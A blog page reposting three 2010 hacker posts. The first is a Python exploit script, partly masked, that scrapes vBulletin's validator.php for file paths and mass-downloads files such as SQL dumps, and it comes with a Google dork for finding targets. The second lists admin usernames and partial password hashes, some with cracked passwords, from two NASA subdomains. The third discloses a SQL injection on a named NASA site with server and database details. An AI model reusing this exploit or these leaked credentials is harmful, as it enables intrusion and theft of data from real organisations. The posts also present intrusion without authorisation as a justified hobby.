Sunday, February 5, 2012

TinKode-vBulletin Full Disclosure [Python]


vBulletin Full Disclosure [Python]

Posted by isrtinkode on February 19, 2010
#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################
#! /usr/bin/env python3.1 
# 
################################################################ 
#                ____        _ _      _   _ (validator.php)    # 
#               |  _ \      | | |    | | (_)                   # 
#         __   _| |_) |_   _| | | ___| |_ _ _ __               # 
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              # 
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             # 
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             # 
#                                   @expl0it...                # 
################################################################ 
#       [ vBulletin Files / Directories Full Disclosure ]      # 
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   # 
#           [ Greetz: insecurity.ro, darkc0de.com ]            # 
################################################################ 
#                                                              # 
#                  Special thanks for: cmiN                    # 
#                  www.TinKode.BayWords.com                    # 
################################################################ 
 
 
import os, sys, urllib.request, urllib.parse, threading 
 
 
def main(): 
    logo = """ 
\t |---------------------------------------------------------------| 
\t |                 ____        _ _      _   _     (TM)           | 
\t |                |  _ \      | | |    | | (_)                   | 
\t |          __   _| |_) |_   _| | | ___| |_ _ _ __               | 
\t |          \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              | 
\t |           \ V /| |_) | |_| | | |  __/ |_| | | | |             | 
\t |            \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             | 
\t |                                                               | 
\t |               vBulletin Full Disclosure expl0it               | 
\t |                      Written by cmiN                          | 
\t |              Vulnerability discovered by TinKode              | 
\t |                                                               | 
\t |              Dork: intext:"Powered by vBulletin"              | 
\t |          Visit: www.insecurity.ro & www.darkc0de.com          | 
\t |---------------------------------------------------------------| 
""" 
    usage = """ 
         |---------------------------------------------------------------| 
         |Usage:  vbfd.py scan http://www.site.com/vB_folder             | 
         |        vbfd.py download *.sql -> all                          | 
         |        vbfd.py download name.jpg -> one                       | 
         |---------------------------------------------------------------|""" 
    if sys.platform in ("linux", "linux2"): 
        clearing = "clear" 
    else: 
        clearing = "cls" 
    os.system(clearing) 
    print(logo) 
    args = sys.argv 
    if len(args) == 3: 
        try: 
            print("Please wait...") 
            if args[1] == "scan": 
                extract_parse_save(********)) 
            elif args[1] == "********": 
                download_data(********) 
        except Exception as message: 
            print("An error occurred: {}".********) 
        except: 
            print("Unknown error.") 
        else: 
            print(********) 
    else: 
        print(usage) 
    input() 
 
 
def extract_parse_save(url): 
    print("[+]********...") 
    hurl = url + "/validator.php" 
    with urllib.request.******** as usock: 
        source = ********() 
    print("[+]Finding ********") 
    word = "validate('" 
    source = source[source******** + len(word):] 
    value = ********] 
    print("[+]Obtaining paths...") 
    hurl = url + "/validator********(value) 
    with urllib.request.urlopen(hurl) as usock: 
        lastk, lastv = None, None 
        dictionary = dict() 
        for line in usock: 
            line = ********() 
            index = ********") 
            if index != -1: 
                lastk = line[index ********(" ") 
            index = line.find("********") 
            if index != -1: 
                lastv = line********) 
            if lastk != None and lastv != None: 
                index = ********) 
                if index in (-1, 0): 
                    lastk = "********) 
                else: 
                    lastk = "[{}] {}".format(********) 
                dictionary[lastk] = lastv 
                lastk, lastv = None, None 
    print("[+]Organizing and saving paths...") 
    with open(********) as fout: 
        fout.********) 
        keys = sorted(dictionary.keys()) 
        for key in keys: 
            fout.write********(key, dictionary[key])) 
 
 
def download_data(files): 
    print("[+]Searching and downloading files...") 
    ******** = 50 
    with open("********) as fin: 
        url = fin.readline(********) 
        if files.find********
            hurl = url + ********) 
            Download(hurl).start() 
        else: 
            ext = files[files.********] 
            for line in fin: 
                pieces = line********) 
                if pieces[0].******** 
                    upath = pieces[1] 
                    hurl = ********) 
                    while threading.active_********) > ******** 
                        pass 
                    Download(********).start() 
    while threading.********) > 1: 
        pass 
 
 
class Download(********): 
 
    def __init__(self, url): 
        threading.Thread.__********) 
        self.url = ******** 
 
    def run(********): 
        try: 
            with urllib.request.urlopen(self.url) as usock: 
                data = ********() 
                uparser = urllib.parse.urlparse(********) 
                pieces = ********.********) 
                fname = pieces[********] 
                with open(********) as fout: 
                    ********.write(data) 
        except: 
            pass 
 
 
********"__main__": 
    main()


You need python 3.1 to work!

TinKode-NASA 2 Websites Full Access


NASA 2 Websites Full Access

Posted by isrtinkode on February 19, 2010
 _   _
| \ | | __ _ ___  __ _
|  \| |/ _` / __|/ _` |
| |\  | (_| \__ \ (_| |
|_| \_|\__,_|___/\__,_|
      #owned by c0de.breaker
I had access to:
www.istd.gsfc.nasa.gov
www.sed.gsfc.nasa.gov
Some screens:
http://i44.tinypic.com/vnjl10.png
http://i41.tinypic.com/25j9zle.png
http://i37.tinypic.com/294t26t.png
http://i35.tinypic.com/qnpf9y.png
http://i38.tinypic.com/23r5mw.png
http://i37.tinypic.com/2rfe92u.png
http://i35.tinypic.com/a57s5e.png
Informations:
#Version: 5.0.41-community-nt-log
#User: **********.gsfc.nasa.gov
#Principal Database: *****
Tables from “*****” database:
#access
#branch
#docs
#docsbranch
#intro
#programs
Columns from “access” table:
#Id
#firstName
#lastName
#userName
#userID
#passWd
#projAdmin
#branchAdmin
#userAdmin
#userEmail
#deleteFlag
#dateCreated
#dateExp
Admins Accounts:
http://www.istd.gsfc.nasa.gov
[1]c****n:****2b550647
[2]c****n:****457ee5exxx = pass
[3]c****n:****14414xxx
[4]am****s:****df47xxx
[5]m****a:****b668859ca = demo
[6]pm****es:****b668859ca = demo
[7]hb****h:****b410747xxx
[8]rb****rut:****b410747xxx
[9]bw****r:****f299589xxx
[10]j****on:****dc4acc0xxx
[11]j****s:****c4acc0xxx
[12]l****ia:****4746f1dxxx
[13]g****w:****33e5ba3axxx
[14]j****le:****ff639f44xxx
[15]d****k:****0cf29958xxx
[16]A****s:****42fa7cxxx
http://www.sed.gsfc.nasa.gov
[17]l****y:****c17889xxx
[18]k****m:****9040104xxx
[19]j****ch:****dc4acc0xxx
[20]c****rmann:****027e9a6xxx
[21]rw****ey:****d42fa7cxxx
[22]y****e:****6107b5cxxx
[23]s****n:****cf29958xxx
[24]b****i:****dd3b569xxx
[25]lr****y:****410747xxx
[26]e****l:****bf05750xxx
[27]cd****ka:****bb79660xxx
[29]j****es:****e4746f1xxx
[30]r****z:****d75fb3exxx
[31]t****ley:****90f14657de5 = d41d8cd9
[32]e****ks:****d75fb3exxx
[33]ph****es:****6e3e050xxx
[34]pp****an:****0877c779xxx
[35]ac****n:****5eb1a0fexxx
I didn’t want to damage anything. Only to show that nasa subdomains have many SQLI, XSS, vulnerabilities etc
#Finish, c0de.breaker

TinKode-NASA Full-Disclosure! AGAIN


NASA Full-Disclosure! AGAIN

Posted by isrtinkode on February 19, 2010
 _   _                      _               _
| \ | | __ _ ___  __ _     / \   __ _  __ _(_)_ __
|  \| |/ _` / __|/ _` |   / _ \ / _` |/ _` | | '_ \
| |\  | (_| \__ \ (_| |  / ___ \ (_| | (_| | | | | |
|_| \_|\__,_|___/\__,_| /_/   \_\__, |\__,_|_|_| |_|
                                |___/
              #Full Disclosure... c0de.breaker
#Important
Ok. First of all, the reason I made this SQLi public ( even though I had no intention to make this ) , is because I found out that somebody else discovered the vulnerable parameter.I found this SQLi 3 months ago.
# Why do I test websites?
Because it is my hobby , and I want to prove that even the big websites, which should be highly secured, can be hacked. This is the reality , and it makes me sad.I feeling alright about what I’m doing, because if anyone finds a vulnerability before me , he/she could use it in harmful ways such as: shelling , rooting , backdooring , deleting etc
The WebSite Vulnerable: http://saif-1.larc.nasa.gov (CEOS Systems Analysis Database)
Testing:


Informations:
#Version: 5.1.31-community
#User: *******
#Main Database: *******
#Path of MySQL: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
Also, the magic_quotes_gpc=OFF, and “user” from mysql have all privileges:
Bad…
Other Databases:
#ceossadb
#information_schema
#mysql
#ceosvis
Tables from “ceosvis” database:
#instrument
#takes
#measurement
#contains
#mission
Tables from main Database:
#agency
#alt_names
#cat_measurements
#cat_missions
#cat_series
#cat_wavebands
#ceosdbversion
#constellations
#data_access_links
#db_update_phases
#ecv
#instr
#instr_agencies
#instr_desc
#instr_geometry
#instr_maturity
#instr_mission
#instr_res_swath_temp
#instr_sampling
#instr_status
#instr_status_biz
#instr_technology
#instr_technology_rawdata
#instr_type
#instr_waveband
#mappedor1
#measurement_confidence
#measurement_desc
#measurement_type
#measurementtypesconfidencepilot
#measurementtypespending
#method
#mission_agencies
#mission_status
#missions
#obs_requirments
#orbit_sense
#orbit_type
#requirements
#series
#series_agency
#series_missions
#societal_benefits
#sys_diagrams
#taxonomy
#typeatmosphere
#typereqapplication
#typerequirementsource
#typesmeasurementsconfidencepilot
#wmo_measurement
I made this public, because I saw the website down, and I think the administrators will fix the vulnerability once someone reports the problem. (sorry because i didn’t make this first, if was that)